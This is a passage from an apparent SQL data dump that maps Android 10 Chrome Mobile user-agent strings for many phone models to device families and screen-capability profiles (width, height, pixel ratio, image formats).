Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; A7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; A7S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; A80) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; A80Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; A80Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; A9 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; AC2001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; AC2003) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; AKA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ALP-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ALP-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ALP-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ALTICE_S43) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ANA-NX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; AQM-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; AQM-LX1; HMSCore 6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L28) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 5.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 5.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 5.3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 6.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 6.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 6.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ART-L29N) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ASUS_I001DC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ASUS_I001DE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ASUS_I002D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ASUS_I01WD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; ASUS_Z01RD) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_asus','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":856,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; AX1078) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Alpha 20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Aquaris X2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_aquaris','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Armor 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Armor 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Armor 9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Armor X5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; Armor X7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BE2013) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BE2029) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BISON) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BKL-AL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BKL-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BLA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BLA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BLA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BMH-AN10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BV4900Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BV5500Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BV6300Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; BV9900E) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; C19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; C21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; C30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CDY-NX9A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CDY-NX9A; HMSCore 5.2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CDY-NX9A; HMSCore 6.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CDY-NX9B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CLT-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CLT-L04) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CLT-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CLT-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; COL-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; COL-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1819) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1821) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1823) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1825) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1877) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1879) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1907) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1911) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1917) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1919) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1921) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1931) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1933) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1937) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1941) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1943) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1951) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1955) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_oppo_cph','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 10; CPH1969) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 